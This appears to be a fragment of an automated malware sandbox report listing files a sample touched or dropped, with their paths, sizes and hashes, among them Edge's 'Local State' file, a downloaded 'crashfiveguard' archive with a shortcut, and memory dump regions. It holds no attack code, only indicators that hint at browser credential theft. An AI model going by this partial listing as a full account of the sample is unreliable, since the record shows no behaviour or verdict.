SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
fe803d3f36b450dabad6525cba6d4ace

SHA1
4643dbb1c5fc397460929b65efcf03d3b9c10cdf

SHA256
222192d8c6871446b854c9e035dd0067811f63679e56ed06053269fda9abbda3

SHA512
7b65d63a3fe9ae9ea68fce7356a3626225390ceeb4b9f761c6ad3520f911d669a48babdd971a63406eb3eef5f49220bdf1937086a0073abcc3565d4f9765081a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
7ec4b04abd7e1f1d81e20057647f7db9

SHA1
57b863a7c84bac6b5135788188b060842ef6c6f3

SHA256
3f60f7d9024877f9d0bc2851f20012d4634b2130acb11b664cfaf439489088bd

SHA512
7d538602da8d74fe1f49d5bca4ab0c56e2d9267b792b37f9fca01da8d993da68f07ef1d4b85e513b356343edd2def18fa5edfb94ee8f0b8e31e08670da7a367a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wkwshrad.xei.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tesasd.txt

Filesize
52KB

MD5
11007bb286caf468648bfdb698077dbe

SHA1
c75bacef9096d5e8d3613e062ca10acb492a2d88

SHA256
04864cb1cc9647bd297b3bf8818595fc65d870a8fa74ee3a420fedfcafdfa292

SHA512
8ef29a7c561a224fca5ff289103b7c8e84c12f92e954bc3751907c430562f42c018aa8f5d7599852dea17bccf93e5fbb2e47cc75ba9ce377b58981f011e2ac17

Download Submit
C:\Users\Admin\Downloads\crashfiveguard (2).rar

Filesize
47KB

MD5
109345152371bff65243158a220e6eb1

SHA1
b05b7abe782ef7bd89f04b1a0bf1e2f69291ec95

SHA256
1cca7067666f4730059e1eebe5f3346c139d13ebc6febda5d43ec6e3e782dcec

SHA512
6b93c76fb6afe1d5acfb7d68ebbb5eb95dae251386200ce59442ce3f6e16221c2a3a21a66ba1adb835939281c5f416fb6c7155ea94335254d9d44eb468dace52

Download Submit
C:\Users\Admin\Downloads\crashfiveguard (2)\example.lnk

Filesize
106KB

MD5
6975af881b0b0e3751002dcc064b886a

SHA1
fa4fe5dfc3897677ee5b5c69cd189e4167427d37

SHA256
f5e258657d2fff2421af1045023ed6ffa0b2c5bdbee9cb186f143ee47320b0a3

SHA512
6ffa48d6d88ea3466a23e793aaca6288e4175c3cae4daa695213aaaa747077795ec5ea5aad0fb666aa59dff14922c8ef70f39245bafed5f891bf815e6eafb587

Download Submit
memory/2524-186-0x000002BAB0350000-0x000002BAB0372000-memory.dmp

Filesize
136KB

Download
memory/3244-210-0x0000000000960000-0x0000000000970000-memory.dmp

Filesize
64KB

Download
memory/3244-222-0x0000000002A80000-0x0000000002A8C000-memory.dmp

Filesize
48KB

Download